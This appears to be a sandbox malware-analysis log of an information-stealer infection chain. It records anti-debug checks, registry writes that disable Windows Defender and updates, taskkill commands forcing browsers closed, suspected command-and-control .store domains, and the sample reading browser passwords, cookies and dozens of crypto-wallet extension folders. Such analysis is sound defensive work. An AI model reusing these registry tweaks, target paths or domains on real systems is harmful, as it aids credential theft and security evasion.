Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\A5RXP2EPUMEJDLAL7A3JI.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\B1DZUXGXMC4OXONLCU5KVQ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Code function: 2_2_003265B9 rdtsc 2_2_003265B9
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Code function: 2_2_0019B7C6 LdrInitializeThunk, 2_2_0019B7C6
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 1171a5b648.exe PID: 2032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 1171a5b648.exe PID: 2148, type: MEMORYSTR
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.1653925235.0000000004F20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
Source: C:\Users\user\AppData\Local\Temp\EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe "C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe "C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe "C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002779001\num.exe "C:\Users\user\AppData\Local\Temp\1002779001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 275df0ca27.exe, 0000000C.00000002.2617209511.0000000000AF2000.00000002.00000001.01000000.00000010.sdmp, 275df0ca27.exe, 00000021.00000000.2706701885.0000000000AF2000.00000002.00000001.01000000.00000010.sdmp, 275df0ca27.exe.8.dr Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: firefox.exe, 0000001B.00000002.2723552985.0000000A4CC8B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: skotes.exe, skotes.exe, 00000007.00000002.1951021674.000000000065E000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: PsProgram Manager
Source: QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, QPHIWB3GKESEWV8SSDAQV1GC2I70.exe, 00000002.00000002.1999899789.000000000036D000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: hProgram Manager
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002778001\275df0ca27.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002779001\num.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002779001\num.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002777001\1171a5b648.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\QPHIWB3GKESEWV8SSDAQV1GC2I70.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: file.exe, 00000000.00000003.1742914022.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2537112071.0000000005271000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2556881049.0000000005277000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 00000009.00000003.2557871545.0000000005279000.00000004.00000800.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2717293558.00000000010C9000.00000004.00000020.00020000.00000000.sdmp, 6cadd3f0fd.exe, 0000000D.00000003.2698690001.00000000010D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 3.2.EUB426480Z8XTJ7PLZ2E322TJ3DJ4.exe.460000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.skotes.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.skotes.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.1946832633.0000000000471000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1919373929.0000000000461000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1950487972.0000000000471000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2318263241.00000000048E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1908505186.0000000004830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1906133835.0000000005240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1878822213.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2607023655.0000000000C3F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 275df0ca27.exe PID: 2312, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6cadd3f0fd.exe PID: 7516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 6cadd3f0fd.exe PID: 6292, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: file.exe PID: 7492, type: MEMORYSTR
Source: Yara match File source: 28.2.num.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.1171a5b648.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.num.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.1171a5b648.exe.f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2529289944.00000000000F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2692045054.000000000117B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2604298529.0000000000E9E000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2531875867.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.2588138718.0000000000E9E000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2611179744.00000000015FE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2488093515.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2604161455.0000000000E81000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.2588009468.0000000000E81000.00000080.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.2632031246.0000000004ED0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2685024844.00000000000F1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1171a5b648.exe PID: 2032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 6072, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 1171a5b648.exe PID: 2148, type: MEMORYSTR
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002779001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: file.exe, 00000000.00000003.1710352481.00000000011DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":2097
Source: file.exe, 00000000.00000003.1710352481.00000000011DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: t":0,"p":"%appdata%\\ElectronCash\\wallets","m":
Source: file.exe String found in binary or memory: Jaxx Liberty
Source: 6cadd3f0fd.exe, 0000000D.00000003.2629694606.00000000010C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: 6cadd3f0fd.exe, 0000000D.00000003.2585953036.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus",
Source: file.exe String found in binary or memory: Wallets/Exodus
Source: file.exe, 00000000.00000003.1710352481.00000000011DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: a%\\Ethereum","m":["keystore"],"z":"Wallets/Ethe
Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
Source: 6cadd3f0fd.exe, 0000000D.00000003.2585953036.00000000010C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1002776001\6cadd3f0fd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
